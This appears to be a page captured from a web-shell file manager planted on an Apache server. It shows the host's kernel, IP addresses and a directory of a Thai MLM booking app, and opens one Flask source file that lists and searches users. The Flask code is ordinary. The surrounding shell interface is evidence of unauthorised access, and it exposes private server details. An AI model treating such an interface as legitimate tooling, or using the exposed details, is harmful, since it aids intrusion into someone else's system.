Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 52.14.131.93
Cant Read [ /etc/named.conf ]
8.3.15
apache
/
var /
www /
afra /
py-maracar.afaa.website /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
email-template
[ DIR ]
drwxr-xr-x
logs
[ DIR ]
drwxr-xr-x
venv
[ DIR ]
drwxr-xr-x
.env
380
B
-rwxr-xr-x
.htaccess
459
B
-rwxr-xr-x
Booking.py
10.46
KB
-rwxr-xr-x
Booking_env_3.py
12.6
KB
-rwxr-xr-x
api_env_2_routes.py
2.92
KB
-rwxr-xr-x
api_env_3_routes.py
9.31
KB
-rwxr-xr-x
booking_delete.py
2.6
KB
-rwxr-xr-x
booking_delete_env_3.py
2.65
KB
-rwxr-xr-x
bookingdetail.py
16.94
KB
-rwxr-xr-x
bookingdetail_env_3.py
23.36
KB
-rwxr-xr-x
branch_env_3.py
6.16
KB
-rwxr-xr-x
change_password.py
2.09
KB
-rwxr-xr-x
check.py
4.36
KB
-rwxr-xr-x
check_env_2.py
3.82
KB
-rwxr-xr-x
check_env_3.py
3.82
KB
-rwxr-xr-x
check_tel.py
4.37
KB
-rwxr-xr-x
checkout.py
2.01
KB
-rwxr-xr-x
config.py
547
B
-rwxr-xr-x
connec_data.py
2.18
KB
-rwxr-xr-x
createkeysecret.py
304
B
-rwxr-xr-x
database.py
1.49
KB
-rwxr-xr-x
decorator.py
3.57
KB
-rwxr-xr-x
forgot.py
2.34
KB
-rwxr-xr-x
gen_uuid.py
4.17
KB
-rwxr-xr-x
image_conn_data.py
1.79
KB
-rwxr-xr-x
image_conn_data3.py
2.02
KB
-rwxr-xr-x
image_urls.py
7.49
KB
-rwxr-xr-x
image_urls_env_3.py
7.71
KB
-rwxr-xr-x
index.html
7.81
KB
-rwxr-xr-x
jangwat_thai.py
8.06
KB
-rwxr-xr-x
maracar.py
14.46
KB
-rwxr-xr-x
maracar.wsgi
379
B
-rwxr-xr-x
maracar_test.py
114
B
-rwxr-xr-x
matching_user_env_2.py
13.19
KB
-rwxr-xr-x
order_send_email_env_3.py
6.6
KB
-rwxr-xr-x
order_send_email_smtpgo.py
7.85
KB
-rw-r--r--
payments.py
9.07
KB
-rwxr-xr-x
payments_env_3.py
12.6
KB
-rwxr-xr-x
payments_payzen.py
14.1
KB
-rwxr-xr-x
payments_test_env_3.py
4.62
KB
-rwxr-xr-x
plot_cpu_usage.py
1.42
KB
-rwxr-xr-x
position_set.py
1.51
KB
-rwxr-xr-x
positions_list.py
987
B
-rwxr-xr-x
price_create.py
13.63
KB
-rwxr-xr-x
price_create3.py
21.56
KB
-rwxr-xr-x
promotion_items.py
4.9
KB
-rwxr-xr-x
promotions.py
8.44
KB
-rwxr-xr-x
queues.py
8.58
KB
-rwxr-xr-x
queues_env_3.py
11.28
KB
-rwxr-xr-x
register.py
5.11
KB
-rwxr-xr-x
register_edit.py
3
KB
-rwxr-xr-x
register_edit_env_2.py
3.14
KB
-rwxr-xr-x
register_edit_env_3.py
3.71
KB
-rwxr-xr-x
register_env_2.py
5.19
KB
-rwxr-xr-x
register_env_3.py
4.44
KB
-rwxr-xr-x
report_bookingoverview.py
9.86
KB
-rwxr-xr-x
report_bookingoverview_env_3.p...
12.93
KB
-rwxr-xr-x
requirements.txt
457
B
-rwxr-xr-x
reviews.py
9.42
KB
-rwxr-xr-x
reviews_env_3.py
12.91
KB
-rwxr-xr-x
service.py
5.87
KB
-rwxr-xr-x
service3.py
7.87
KB
-rwxr-xr-x
sms_octopush.py
1.71
KB
-rwxr-xr-x
sms_thsms3.py
2.09
KB
-rwxr-xr-x
specificinsert_env_2.py
3.63
KB
-rwxr-xr-x
status_list.py
960
B
-rwxr-xr-x
types_create.py
4.6
KB
-rwxr-xr-x
types_create3.py
8.91
KB
-rwxr-xr-x
update_status.py
2.52
KB
-rwxr-xr-x
user.py
4.02
KB
-rwxr-xr-x
user3.py
4.78
KB
-rwxr-xr-x
user_all.py
3.88
KB
-rwxr-xr-x
user_all_env_2.py
5.81
KB
-rwxr-xr-x
user_all_env_3.py
8.44
KB
-rwxr-xr-x
user_all_mlm.py
9.18
KB
-rwxr-xr-x
user_all_mlm_env_2.py
9.26
KB
-rwxr-xr-x
user_env_2.py
4.1
KB
-rwxr-xr-x
user_mlm.py
10.47
KB
-rwxr-xr-x
user_mlm_env_2.py
10.49
KB
-rwxr-xr-x
user_mlm_env_3.py
18.45
KB
-rw-r--r--
user_routes.py
1.28
KB
-rwxr-xr-x
website1.env
12
B
-rwxr-xr-x
website2.env
12
B
-rwxr-xr-x
website3.env
12
B
-rwxr-xr-x
website4.env
12
B
-rwxr-xr-x
website5.env
12
B
-rwxr-xr-x
Code Editor : user_all_mlm_env_2.py
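#/var/www/website2024/py-maracar.afaa.website/user_all_mlm_env_2.py
# python3 user_all_mlm_env_2.py
"""Flask service exposing the MLM user/team listing and search endpoints.

Both endpoints are wrapped in ``token_required`` and read from the ``user``
and ``user_team`` tables, scoped to the website id taken from the
``WEBSITE_ID2`` environment variable.

Security-relevant points for reviewers:

* Filter values always travel as bound parameters. The ORDER BY column and
  direction cannot be bound, so they are resolved against an allow-list
  before they are placed in the SQL text.
* The development server only enables the Werkzeug debugger when
  ``FLASK_DEBUG`` is set explicitly.
"""
from flask import Flask, request, jsonify, make_response
from flask_cors import CORS
import mysql.connector
import threading
import time
from datetime import timedelta
import logging
from logging.handlers import RotatingFileHandler
import os
from functools import wraps
import jwt
from dotenv import load_dotenv
from decorator import token_required
from config import SECRET_KEY, DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME
import re

# Load the specific .env file directly
load_dotenv('/var/www/website2024/py-maracar.afaa.website/.env')

app = Flask(__name__)
# NOTE(review): every origin is allowed on every route. If the bearer token is
# the only access control, confirm that this is intended and restrict the
# origins to the known front-ends otherwise.
CORS(app, resources={r"/*": {"origins": "*"}})
app.config['SECRET_KEY'] = SECRET_KEY

# Setup logging
log_dir = '/var/log/python'
# exist_ok avoids the check-then-create race when several workers start at once.
os.makedirs(log_dir, exist_ok=True)

file_handler = RotatingFileHandler(os.path.join(log_dir, 'flask_app.log'), maxBytes=100000, backupCount=10)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
app.logger.setLevel(logging.INFO)

# Columns and aliases of the listing query that a caller may sort by.
# Identifiers cannot be sent as bound parameters, so ORDER BY is restricted to
# this fixed set. Keys are lower-cased for lookup; values are the canonical
# spelling that is written into the SQL text.
_SORTABLE_COLUMNS = {
    name.lower(): name
    for name in (
        'u.user_ID', 'u.first_name', 'u.sur_name', 'u.telephone', 'u.email',
        'u.contact', 'u.image', 'u.status_ID', 'u.position_ID', 'u.date',
        'u.time', 'u.ip', 'u.birthday', 'u.social_media', 'u.thamboonID',
        'u.amphoeID', 'u.jangwatID',
        'ut.user_team_id', 'ut.sponsor_id', 'ut.team_id', 'ut.effective_date',
        'ut.position_ID', 'ut.commission_rate', 'ut.entry_order', 'ut.join_date',
        's.first_name', 's.sur_name',
        'user_team_position_ID', 'sponsor_first_name', 'sponsor_sur_name',
    )
}
_SORT_DIRECTIONS = ('ASC', 'DESC')

_USERS_SELECT = '''
        SELECT
            u.user_ID, u.first_name, u.sur_name, u.telephone, u.email,
            u.contact, u.image, u.status_ID, u.position_ID, u.date, u.time,
            u.ip, u.birthday, u.social_media, u.thamboonID, u.amphoeID, u.jangwatID,
            ut.user_team_id, ut.sponsor_id, ut.team_id, ut.effective_date,
            ut.position_ID AS user_team_position_ID, ut.commission_rate,
            ut.entry_order, ut.join_date,
            s.first_name AS sponsor_first_name, s.sur_name AS sponsor_sur_name
        FROM user u
        INNER JOIN user_team ut ON u.user_ID = ut.user_id
        LEFT JOIN user s ON ut.sponsor_id = s.user_ID
        WHERE u.websiteID = %s
    '''

_USERS_COUNT = '''
        SELECT COUNT(*) as total_count
        FROM user u
        INNER JOIN user_team ut ON u.user_ID = ut.user_id
        LEFT JOIN user s ON ut.sponsor_id = s.user_ID
        WHERE u.websiteID = %s
    '''


def get_website_id():
    """Return the website id this service is scoped to (env ``WEBSITE_ID2``)."""
    return os.getenv('WEBSITE_ID2')


# Function to sanitize input by removing unwanted characters
def sanitize_input(value):
    """Strip every character outside printable ASCII (0x20-0x7E) from *value*.

    ``None`` is passed through unchanged. This is input normalisation only; it
    is not what protects the queries, which rely on bound parameters.
    """
    if value is not None:
        # Remove non-printable characters and unwanted unicode characters
        value = re.sub(r'[^\x20-\x7E]', '', value)
    return value


def _resolve_order_by(order_by):
    """Map a requested sort column to its allow-listed spelling, else ``None``."""
    if not isinstance(order_by, str):
        return None
    return _SORTABLE_COLUMNS.get(order_by.strip().lower())


def _build_user_filters(position_id, status_id, first_name, sur_name,
                        telephone, email, user_ID_for):
    """Build the optional ``AND ...`` clauses shared by the list and count queries.

    Returns ``(sql_fragment, params)``. Keeping one builder guarantees that the
    total count and the returned page are computed from identical predicates.
    """
    clauses = []
    params = []
    if position_id:
        clauses.append(' AND u.position_ID = %s')
        params.append(position_id)
    if status_id:
        clauses.append(' AND u.status_ID = %s')
        params.append(status_id)
    if first_name:
        clauses.append(' AND u.first_name LIKE %s')
        params.append(f"%{first_name}%")
    if sur_name:
        clauses.append(' AND u.sur_name LIKE %s')
        params.append(f"%{sur_name}%")
    if telephone:
        telephone = sanitize_input(telephone)
        clauses.append(' AND u.telephone LIKE %s')
        params.append(f"%{telephone}%")
    if email:
        clauses.append(' AND u.email LIKE %s')
        params.append(f"%{email}%")
    if user_ID_for:
        user_ID_for = sanitize_input(user_ID_for)
        clauses.append(' AND u.user_ID LIKE %s')
        params.append(f"%{user_ID_for}%")
    # NOTE(review): '%' and '_' inside the supplied values still act as LIKE
    # wildcards; escape them if literal matching is required.
    return ''.join(clauses), params


def _open_connection():
    """Open a new MySQL connection using the credentials from ``config``."""
    return mysql.connector.connect(
        host=DATABASE_HOST,
        user=DATABASE_USER,
        password=DATABASE_PASSWORD,
        database=DATABASE_NAME
    )


# Function to fetch user and team details from the database
def fetch_all_users_mlm(user_id=None, position_id=None, status_id=None, first_name=None, sur_name=None, telephone=None, email=None, user_ID_for=None, limit=None, offset=None, order_by='u.user_ID', order_dir='ASC'):
    """Return the users (joined with team and sponsor data) matching the filters.

    ``user_id`` is accepted for interface compatibility but is not applied to
    the query. ``limit`` and ``offset`` are only used when both are given.

    Raises:
        ValueError: if ``order_by`` is not an allow-listed column or
            ``order_dir`` is not ASC/DESC. Both end up in the SQL text, so
            they must never be taken from a request unchecked.
    """
    sort_column = _resolve_order_by(order_by)
    if sort_column is None:
        raise ValueError('Invalid order_by column')
    direction = str(order_dir).upper()
    if direction not in _SORT_DIRECTIONS:
        raise ValueError('Invalid order direction')

    filter_sql, filter_params = _build_user_filters(
        position_id, status_id, first_name, sur_name, telephone, email, user_ID_for)

    # Only allow-listed identifiers are interpolated; every value is bound.
    query = _USERS_SELECT + filter_sql + f' ORDER BY {sort_column} {direction}'
    query_params = [get_website_id()] + filter_params

    if limit is not None and offset is not None:
        query += ' LIMIT %s OFFSET %s'
        query_params.extend([limit, offset])

    conn = _open_connection()
    try:
        cursor = conn.cursor(dictionary=True)
        try:
            cursor.execute(query, query_params)
            users_data = cursor.fetchall()
        finally:
            cursor.close()
    finally:
        # Close the connection even when the query raises, so failed requests
        # do not leak database connections.
        conn.close()

    # timedelta values are turned into strings before the rows are returned;
    # presumably TIME columns arrive as timedelta and would not serialise to
    # JSON otherwise (confirm against the schema).
    return [
        {k: str(v) if isinstance(v, timedelta) else v for k, v in user.items()}
        for user in users_data
    ]


# Function to fetch total count of users matching the criteria
def fetch_total_users_count(user_id=None, position_id=None, status_id=None, first_name=None, sur_name=None, telephone=None, email=None, user_ID_for=None):
    """Return how many users match the filters, ignoring paging.

    Uses the same predicate builder as ``fetch_all_users_mlm``. ``user_id`` is
    accepted for interface compatibility but is not applied to the query.
    """
    filter_sql, filter_params = _build_user_filters(
        position_id, status_id, first_name, sur_name, telephone, email, user_ID_for)
    count_query = _USERS_COUNT + filter_sql
    count_query_params = [get_website_id()] + filter_params

    conn = _open_connection()
    try:
        cursor = conn.cursor(dictionary=True)
        try:
            cursor.execute(count_query, count_query_params)
            total_count = cursor.fetchone()['total_count']
        finally:
            cursor.close()
    finally:
        conn.close()

    return total_count


@app.route('/register/api_env_2/all_users_mlm', methods=['GET'])
@token_required
def all_users_mlm_env_2():
    """List users filtered by position/status with optional paging and sorting."""
    try:
        user_id = request.args.get('user_ID')
        position_id = request.args.get('position_ID')
        status_id = request.args.get('status_ID')
        limit = request.args.get('limit', type=int)
        offset = request.args.get('offset', type=int)
        order_by = request.args.get('order_by', default='u.user_ID')
        order_dir = request.args.get('order_dir', default='ASC')

        # Validate order direction
        if order_dir not in ['ASC', 'DESC']:
            return jsonify({'message': 'Invalid order direction. Use "ASC" or "DESC".'}), 400

        # Validate the sort column against the allow-list before it can reach SQL.
        order_by = _resolve_order_by(order_by)
        if order_by is None:
            return jsonify({'message': 'Invalid order_by column.'}), 400

        # %r keeps control characters in request values from forging log lines.
        app.logger.info(
            "Received request with params: user_id=%r, position_id=%r, status_id=%r, "
            "limit=%r, offset=%r, order_by=%r, order_dir=%r",
            user_id, position_id, status_id, limit, offset, order_by, order_dir)

        total_users_count = fetch_total_users_count(user_id, position_id, status_id)
        users_data = fetch_all_users_mlm(user_id, position_id, status_id, limit=limit, offset=offset, order_by=order_by, order_dir=order_dir)

        response_data = {
            'total_count': total_users_count,
            'displayed_count': len(users_data),
            'users': users_data
        }

        return jsonify(response_data), 200

    except Exception as e:
        # Details stay in the server log; the client only sees a generic error.
        app.logger.error("Error occurred: %s", e)
        return jsonify({'message': 'Internal Server Error'}), 500


@app.route('/register/api_env_2/all_users_mlm_search', methods=['GET', 'POST', 'PUT'])
@token_required
def all_users_mlm_search_env_2():
    """Search users by name, telephone, email or id with optional paging and sorting."""
    try:
        user_id = request.args.get('user_ID')
        position_id = request.args.get('position_ID')
        status_id = request.args.get('status_ID')
        first_name = request.args.get('first_name')
        sur_name = request.args.get('sur_name')
        telephone = request.args.get('telephone')
        email = request.args.get('email')
        user_ID_for = request.args.get('user_ID_for')
        limit = request.args.get('limit', type=int)
        offset = request.args.get('offset', type=int)
        order_by = request.args.get('order_by', default='u.user_ID')
        order_dir = request.args.get('order_dir', default='ASC')

        # Validate order direction
        if order_dir not in ['ASC', 'DESC']:
            return jsonify({'message': 'Invalid order direction. Use "ASC" or "DESC".'}), 400

        # Validate the sort column against the allow-list before it can reach SQL.
        order_by = _resolve_order_by(order_by)
        if order_by is None:
            return jsonify({'message': 'Invalid order_by column.'}), 400

        total_users_count = fetch_total_users_count(user_id, position_id, status_id, first_name, sur_name, telephone, email, user_ID_for)
        users_data = fetch_all_users_mlm(user_id, position_id, status_id, first_name, sur_name, telephone, email, user_ID_for, limit, offset, order_by, order_dir)

        response_data = {
            'total_count': total_users_count,
            'displayed_count': len(users_data),
            'users': users_data
        }

        response = make_response(jsonify(response_data), 200)
        response.headers.add('Access-Control-Allow-Origin', '*')
        response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
        response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')
        return response

    except Exception as e:
        # Same handling as the listing endpoint: log server-side, answer generically.
        app.logger.error("Error occurred: %s", e)
        return jsonify({'message': 'Internal Server Error'}), 500


if __name__ == '__main__':
    # The Werkzeug debugger gives code execution to anyone who can reach it, and
    # this server listens on all interfaces. Debug mode is therefore off unless
    # FLASK_DEBUG is set explicitly on a developer machine.
    debug_enabled = os.getenv('FLASK_DEBUG', '').strip().lower() in ('1', 'true')
    # NOTE(review): ports below 1024 normally need elevated privileges; confirm
    # the process is not started as root just to bind 423.
    app.run(debug=debug_enabled, host='0.0.0.0', port=423)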